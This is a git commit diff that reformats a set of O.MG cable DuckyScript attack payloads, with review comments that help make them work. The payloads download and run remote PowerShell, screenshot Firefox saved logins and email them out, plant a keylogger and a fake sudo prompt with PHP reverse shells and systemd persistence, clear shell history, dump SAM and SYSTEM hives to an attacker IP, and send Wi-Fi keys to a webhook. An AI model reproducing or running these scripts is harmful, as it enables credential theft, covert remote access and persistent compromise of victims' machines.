Fixing misc execution or formatting errors

There are many payloads in the repo that do not run due to compiler errors (mostly typos, but a few commands that do not exist on O.MG devices).

Fixing those errors, along with implementing minor changes such as using STRINGLN in place of STRING and ENTER, or DEFAULT_DELAY in place of DELAY 200 on every other line for improved readability.

No content of these scripts has been altered, and I do not intend to run them to validate that they work as intended on their target operating systems.
syntaxFixes
kalanihelekunihi 2023-06-05 12:29:42 -04:00
parent 63ce12dd61
commit 4a0fdf22c3
32 changed files with 679 additions and 1249 deletions

View File

@ -1,15 +1,18 @@
REM Title: Credz-Plz REM_BLOCK
Title: Credz-Plz
Author: I am Jakoby
Target: Windows 10, 11
REM Author: I am Jakoby Description: This payload is meant to prompt the target to enter their creds to later be ted with dropbox. See README.md file for more details.
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details. Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
REM Target: Windows 10, 11 DEFINE #URL
DUCKY_LANG US
DELAY 2000
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://#URL?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
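Review bot: the new "DEFINE #URL" line has no value, so "https://#URL?dl=1" in the STRINGLN either compiles with a literal "#URL" or fails, depending on how the firmware treats an empty constant; give it a placeholder the way the other rewritten payloads do (for example "DEFINE #URL <Your Shared link for the intended file>"). Two related checks: the constant is glued to "?dl=1" with no whitespace, so confirm the target firmware substitutes a constant that has trailing text attached, and the REM_BLOCK still tells the user to "replace the link" and to swap "?dl=0" for "?dl=1", which no longer describes the script (the suffix is hardcoded and the value belongs on the DEFINE line). Also decide whether the value is the full shared link or only host and path: this file prefixes "https://", Shortcut-Jacker further down in this commit does not, so a pasted Dropbox link that already starts with "https://" works in one payload and not the other.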

View File

@ -1,192 +1,92 @@
REM Title: Harvester_OF_SORROW REM_BLOCK
REM Author: LulzAnarchyAnon Title: Harvester_OF_SORROW
REM Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a Author: LulzAnarchyAnon
REM pin, or password is required to export saved log in credentials. Description: This payload is a long, hard work around to bypass Microsoft Security in Firefox where a pin, or password is required to export saved log in credentials.
REM The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes
REM a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot The payload opens firefox about:logins, and tabs, and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.
REM to an email of your choosing.
REM Target: Windows 10, PowerShell & Mozilla Firefox Target: Windows 10, PowerShell & Mozilla Firefox
Props: Darren Kitchen, KARROTKAK3, I am Jakoby and the-jcksn Props: Darren Kitchen, KARROTKAK3, I am Jakoby and the-jcksn
REM Version: 1.0
REM Category: Credentials (OMG)
Version: 1.0
Category: Credentials (OMG)
REM Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds. Payload DELAYS,TABS AND ARROWS may need to be ajusted depending on target system speeds.
REM After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from After email aqusition you will be able to adjust DELAYS,TABS AND ARROWS to harvest other creds from the email screen shot.
REM the email screen shot.
You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
Can exfil more than 5, but I chose 5 to keep file sizes low.
Can exfil from directory other than screenshots by changing path.
You might have to adjust the delays, depending on the target machine, but these worked ok for me.
Use responsibly, and within the confines of the law.
END_REM
DEFINE #USER_EMAIL user@example.com
DEFINE #USER_PASSWORD supersecretpassword
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 200
GUI r GUI r
DELAY 200 STRINGLN firefox about:logins
STRING firefox about:logins
ENTER
DELAY 1000 DELAY 1000
TAB REPEAT 10 TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
TAB
DELAY 1000 DELAY 1000
SHIFT SPACE SHIFT SPACE
DELAY 5000 DELAY 5000
PRINTSCREEN PRINTSCREEN
DELAY 5000 DELAY 5000
GUI r GUI r
DELAY 200 STRINGLN powershell -windowstyle hidden
STRING powershell -windowstyle hidden
ENTER
DELAY 2000 DELAY 2000
STRING mspaint STRINGLN mspaint
ENTER
DELAY 5000 DELAY 5000
CTRL v CTRL v
DELAY 2000 DELAY 2000
CTRL s CTRL s
TAB REPEAT 11 TAB
DELAY 300
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 100
RIGHTARROW RIGHTARROW
DELAY 100
DOWNARROW DOWNARROW
DELAY 100 REPEAT 2 RIGHTARROW
RIGHTARROW
DELAY 100
RIGHTARROW
DELAY 200
TAB TAB
DELAY 200
ENTER ENTER
CTRL RIGHTARROW REPEAT 2 CTRL RIGHTARROW
DELAY 100 REPEAT 13 TAB
CTRL RIGHTARROW REPEAT 2 RIGHTARROW
DELAY 100
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
RIGHTARROW
DELAY 200
RIGHTARROW
ENTER ENTER
TAB TAB
ENTER ENTER
DELAY 1000 DELAY 1000
ALT f ALT f
DELAY 50
ALT X ALT X
DELAY 50
ALT f ALT f
DELAY 50
X X
DELAY 2000 DELAY 2000
REM ~~~~ You must change the USER_EMAIL and USER_PASSWORD to your outlook credentials.
REM ~~~~ Can exfil more than 5, but I chose 5 to keep file sizes low.
REM ~~~~ Can exfil from directory other than screenshots by changing path on lines 18, 57, and 61.
REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me.
REM ~~~~ Use responsibly, and within the confines of the law.
DELAY 2000
GUI r GUI r
DELAY 200
REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots REM navigating to the directory to exfil from - change the following if you do not want the latest screenshots
STRING %USERPROFILE%\Pictures\Screenshots STRINGLN %USERPROFILE%\Pictures\Screenshots
ENTER
DELAY 150
REM sorting the files by date REM sorting the files by date
MENU SHIFT F10
DELAY 150
STRING o STRING o
DELAY 150
DOWNARROW DOWNARROW
DELAY 150
ENTER ENTER
DELAY 150
REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays REM selecting files to exfil, repeat this line if you want more than 5, but bear in mind this might impact some of the delays
SHIFT RIGHTARROW REPEAT 4 SHIFT RIGHTARROW
SHIFT RIGHTARROW
SHIFT RIGHTARROW
SHIFT RIGHTARROW
DELAY 150
REM sending files to loot.zip REM sending files to loot.zip
MENU SHIFT F10
DELAY 150
STRING n STRING n
DELAY 200
DOWNARROW DOWNARROW
DELAY 150
ENTER ENTER
DELAY 500 DELAY 500
STRING loot STRINGLN loot
ENTER
DELAY 150
ALT F4 ALT F4
DELAY 150
GUI r GUI r
DELAY 150
REM open powershell and send the email REM open powershell and send the email
STRING powershell STRINGLN powershell
ENTER
DELAY 500 DELAY 500
REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~ REM ~~~~~~~CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING~~~~~
STRING Send-MailMessage -From user@example.com -To user@example.com -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList user@example.com, (ConvertTo-SecureString -String "supersecretpassword" -AsPlainText -Force)) STRINGLN Send-MailMessage -From #USER_EMAIL -To #USER_EMAIL -Subject "Photo loot" -Body "Please find attached your zip file" -Attachment "Pictures\Screenshots\loot.zip" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #USER_EMAIL, (ConvertTo-SecureString -String "#USER_PASSWORD" -AsPlainText -Force))
ENTER
DELAY 500 DELAY 500
REM cleanup REM cleanup
STRING del Pictures\Screenshots\loot.zip STRINGLN del Pictures\Screenshots\loot.zip
ENTER STRINGLN exit
DELAY 150
STRING exit
ENTER
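Review bot: the "REPEAT n <key>" form used throughout this hunk ("REPEAT 10 TAB", "REPEAT 11 TAB", "REPEAT 2 CTRL RIGHTARROW", "REPEAT 13 TAB", "REPEAT 2 RIGHTARROW", "REPEAT 4 SHIFT RIGHTARROW") is not the classic DuckyScript REPEAT, which takes only a count and repeats the previous line; if the O.MG firmware this targets uses the classic form, each of these must become the key on its own line followed by "REPEAT n-1", and since the commit message says nothing was run, this is the one construct here worth compiling before merge. The counts do match the original (10, 11, 2, 13, 2 and 4 presses), so nothing changes on that axis. Two smaller points: "DEFAULT_DELAY 200" silently raises the original 50 ms, 100 ms and 150 ms pauses (the ALT f / ALT X / X sequence and the Explorer context-menu steps) to 200 ms, which is harmless but contradicts "no content altered"; and the REM "CHANGE THE USERNAME (3 times) AND PASSWORD (once) IN THE FOLLOWING" above the Send-MailMessage line is now stale, because both values come from the "#USER_EMAIL" and "#USER_PASSWORD" DEFINE lines and should be edited there.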

View File

@ -1,93 +1,75 @@
REM Title: DuckyLogger REM_BLOCK
REM Description: Key logger which sends each and every key stroke of target remotely/locally. Title: DuckyLogger
REM AUTHOR: drapl0n Description: Key logger which sends each and every key stroke of target remotely/locally.
REM Version: 1.0 AUTHOR: drapl0n
REM Category: Credentials Version: 1.0
REM Target: Unix-like operating systems with systemd Category: Credentials
REM Attackmodes: HID Target: Unix-like operating systems with systemd
Attackmodes: HID
REM [Note] Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
REM Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions. END_REM
DUCKY_LANG US
REM [keeping tracks clear] REM [keeping tracks clear]
DELAY 5000 DELAY 5000
CTRL ALT t CTRL ALT t
DELAY 400 DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100 DELAY 100
REM [creating key logging mechanism] REM [creating key logging mechanism]
STRING mkdir /var/tmp/.system STRINGLN mkdir /var/tmp/.system
ENTER
DELAY 100 DELAY 100
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys STRINGLN echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
ENTER
DELAY 100 DELAY 100
STRING chmod +x /var/tmp/.system/sys STRINGLN chmod +x /var/tmp/.system/sys
ENTER
DELAY 100 DELAY 100
REM [importing xinput] REM [importing xinput]
STRING cd /var/tmp/.system/ STRINGLN cd /var/tmp/.system/
ENTER
DELAY 100 DELAY 100
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true STRINGLN wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
ENTER
DELAY 5000 DELAY 5000
STRING chmod +x xinput STRINGLN chmod +x xinput
ENTER
DELAY 100 DELAY 100
REM [creating reverse shell] REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100 DELAY 100
STRING chmod +x /var/tmp/.system/systemBus STRINGLN chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100 DELAY 100
REM [creating systemd service to execute payload on boot] REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user STRINGLN mkdir -p ~/.config/systemd/user
ENTER
DELAY 200 DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100 DELAY 100
REM [creating reboot script incase if listner stops or targets internet connection gets lost] REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER
DELAY 100 DELAY 100
STRING chmod +x /var/tmp/.system/reboot STRINGLN chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100 DELAY 100
REM [creating systemd service to execute payload on boot] REM [creating systemd service to execute payload on boot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100 DELAY 100
REM [enabling service] REM [enabling service]
STRING systemctl --user daemon-reload STRINGLN systemctl --user daemon-reload
ENTER
DELAY 300 DELAY 300
STRING systemctl --user enable --now systemBUS.service STRINGLN systemctl --user enable --now systemBUS.service
ENTER
DELAY 150 DELAY 150
STRING systemctl --user start --now systemBUS.service STRINGLN systemctl --user start --now systemBUS.service
ENTER
DELAY 150 DELAY 150
STRING systemctl --user enable --now reboot.service STRINGLN systemctl --user enable --now reboot.service
ENTER
DELAY 150 DELAY 150
STRING systemctl --user start --now reboot.service STRINGLN systemctl --user start --now reboot.service
ENTER
DELAY 100 DELAY 100
REM [autostarting service on terminal/shell launch] REM [autostarting service on terminal/shell launch]
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp STRINGLN echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER
DELAY 100 DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER
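Review bot: the STRING+ENTER to STRINGLN conversion is mechanical and correct, but the reverse-shell line this hunk re-types ("echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then ...") has "$?" unescaped inside double quotes while "\$sock" is escaped, so "$?" is expanded by the shell at echo time (the exit status of the preceding chmod) and the written file contains "if [ 0 -eq 0 ]", making the connect attempt unconditional instead of gated on the ping; the nested exec("\"...\"") quoting on the same line also looks unbalanced. Both are pre-existing and outside the stated scope ("no content altered"), but since STRINGLN now carries these long lines, confirm the firmware types "\n", "\t" and "\"" literally with no escape processing of its own, and consider a TODO in the REM_BLOCK pointing at the "$?" escape so the next person does not debug it from scratch.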

View File

@ -1,33 +1,24 @@
REM Title: SamDumpCable REM_BLOCK
REM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes. Title: SamDumpCable
REM Author: 0iphor13 Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
REM Version: 1.0 Author: 0iphor13
REM Category: Credentials Version: 1.0
REM Requirements: OMG Firmware v.2.5 or higher Category: Credentials
Requirements: OMG Firmware v.2.5 or higher
END_REM
DEFINE #IPADDRESS 0.0.0.0
DELAY 1000
DUCKY_LANG de DUCKY_LANG de
DELAY 500 DELAY 2000
DEFAULT_DELAY 500
DELAY 1500
GUI r GUI r
DELAY 500 STRINGLN powershell Start-Process powershell -Verb runAs
STRING powershell Start-Process powershell -Verb runAs
DELAY 500
ENTER
DELAY 1000
REM Change this Change this shortcut depending on the systems language (engl.: ALT y) REM Change this Change this shortcut depending on the systems language (engl.: ALT y)
ALT j ALT j
DELAY 250
STRING powershell.exe -NoP -enc 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 STRINGLN powershell.exe -NoP -enc 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
DELAY 200
ENTER
DELAY 200
REM Insert your recieving servers IP here ---------------------------------------------------------- REM Insert your recieving servers IP here ----------------------------------------------------------
STRING iwr "http://0.0.0.0" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit STRINGLN iwr "http://#IPADDRESS" -Method POST -InFile OMGdump.zip;Remove-Item OMGdump.zip;exit
DELAY 200
ENTER
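Review bot: the wait for the UAC prompt got shorter. The original typed the "Start-Process powershell -Verb runAs" line, waited "DELAY 500", pressed ENTER, then waited "DELAY 1000" before "ALT j"; the rewrite relies on "DEFAULT_DELAY 500" alone between the STRINGLN and "ALT j", so on a slow machine the consent dialog may not yet have focus and the payload stalls at the prompt. Keep an explicit "DELAY 1000" (or longer) before "ALT j". The "DEFINE #IPADDRESS 0.0.0.0" placeholder is fine, but the REM above the iwr line still says "Insert your recieving servers IP here" as if the address were edited on that line; point it at the DEFINE instead and fix "recieving".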

View File

@ -1,82 +1,51 @@
REM Title: sudoSnatch REM_BLOCK
REM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally.. Title: sudoSnatch
REM AUTHOR: drapl0n Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..
REM Version: 1.0
REM Category: Credentials AUTHOR: drapl0n
REM Target: Unix-like operating systems with systemd Version: 1.0
REM Attackmodes: HID Category: Credentials
Target: Unix-like operating systems with systemd
Attackmodes: HID
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 100
REM [keeping tracks clear] REM [keeping tracks clear]
DELAY 5000
CTRL ALT t CTRL ALT t
DELAY 400 DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100
REM [creating password grabbing mechanism] REM [creating password grabbing mechanism]
STRING mkdir /var/tmp/.system STRINGLN mkdir /var/tmp/.system
ENTER STRINGLN echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr
DELAY 100 STRINGLN touch /var/tmp/.system/sysLog
STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\" read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\"" > /var/tmp/.system/systemMgr STRINGLN chmod +x /var/tmp/.system/systemMgr
ENTER
DELAY 100
STRING touch /var/tmp/.system/sysLog
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemMgr
ENTER
DELAY 100
REM [creating reverse shell] REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus STRINGLN echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"cat /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER STRINGLN chmod +x /var/tmp/.system/systemBus
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
REM [creating systemd service to execute payload on boot] REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user STRINGLN mkdir -p ~/.config/systemd/user
ENTER STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
REM [creating reboot script incase if listner stops or targets internet connection gets lost] REM [creating reboot script incase if listner stops or targets internet connection gets lost]
STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot STRINGLN echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
ENTER STRINGLN chmod +x /var/tmp/.system/reboot
DELAY 100
STRING chmod +x /var/tmp/.system/reboot
ENTER
DELAY 100
REM [creating systemd service for reboot] REM [creating systemd service for reboot]
STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service STRINGLN echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
ENTER
DELAY 100
REM [enabling services] REM [enabling services]
STRING systemctl --user daemon-reload STRINGLN systemctl --user daemon-reload
ENTER STRINGLN systemctl --user enable --now systemBUS.service
DELAY 300 STRINGLN systemctl --user start --now systemBUS.service
STRING systemctl --user enable --now systemBUS.service STRINGLN systemctl --user enable --now reboot.service
ENTER STRINGLN systemctl --user start --now reboot.service
DELAY 150
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 150
STRING systemctl --user enable --now reboot.service
ENTER
DELAY 150
STRING systemctl --user start --now reboot.service
ENTER
DELAY 100
REM [autostarting service on terminal/shell launch] REM [autostarting service on terminal/shell launch]
STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp STRINGLN echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
ENTER STRINGLN chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
DELAY 100
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER
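Review bot: the leading "DELAY 5000" before "CTRL ALT t" was dropped in favour of "DELAY 2000" plus "DEFAULT_DELAY 100", so the terminal now opens roughly three seconds earlier than before; on a Linux desktop that has just enumerated the HID device, those five seconds were the margin the author chose, and shortening them is a behavior change despite "no content altered". Keep "DELAY 5000" here (the companion DuckyLogger payload in this same commit keeps it). The shell-typed lines that follow are safe to run back-to-back at 100 ms, since the terminal queues input while the previous command executes. As in DuckyLogger, the systemBus line has "$?" unescaped inside the double-quoted "echo -e", so the written loop tests "[ 0 -eq 0 ]" instead of the ping result; pre-existing, but worth a TODO.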

View File

@ -1,27 +1,24 @@
REM I took my own code and found the other version already made. I combined them to make it better REM_BLOCK
REM this is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino DESCRIPTION:
REM this is designed for the omg cable instead of the tiny. I took my own code and found the other version already made. I combined them to make it better.
This is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino
This is designed for the omg cable instead of the tiny.
END_REM
DEFINE #WEBHOOKADDR <ADD-WEBHOOK-ADDRESS-HERE>
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
Delay 3000
STRING GUI r STRING GUI r
Delay 100 STRINGLN cmd /k mode con: cols=15 lines=1
String cmd /k mode con: cols=15 lines=1 STRINGLN cd %temp%
Enter STRINGLN netsh wlan export profile key=clear
Delay 500 STRINGLN powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
String cd %temp% DELAY 3000
Enter STRINGLN powershell Invoke-WebRequest -Uri https://webhook.site/#WEBHOOKADDR -Method POST -InFile Wi-Fi-PASS
Delay 500
String netsh wlan export profile key=clear
Enter
Delay 1000
String powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
Enter
Delay 3000 Delay 3000
String powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS STRINGLN del Wi* /s /f /q
Enter STRINGLN exit
Delay 3000
String del Wi* /s /f /q
Enter
Delay 1000
Exit
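Review bot: "STRING GUI r" on the first command line is still wrong in both columns: it types the text "GUI r" into whatever window has focus instead of pressing Win+R, so none of the following "cmd /k ..." lines ever reach a Run box. This is exactly the class of typo the commit sets out to fix, and it is the one that makes this payload a no-op; change it to "GUI r". The lower-case "Delay 3000" before the "del Wi*" line also survives unchanged while every other keyword was upper-cased, so if the parser is case-sensitive (the reason the bare "Exit" at the end was replaced with "STRINGLN exit") that line fails too. Finally, the REM_BLOCK uses "DESCRIPTION:" where the other rewritten headers use "Title:"/"Description:"; pick one.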

View File

@ -1,16 +0,0 @@
REM Title: Play-WAV
REM Author: I am Jakoby
REM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details
REM Target: Windows 10, 11
REM Remeber to replace the link with your link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
DELAY 500
ENTER

View File

@ -0,0 +1,19 @@
REM_BLOCK
Title: Play-WAV
Author: I am Jakoby
Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more
Target: Windows 10, 11
Remeber to replace the link with your link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
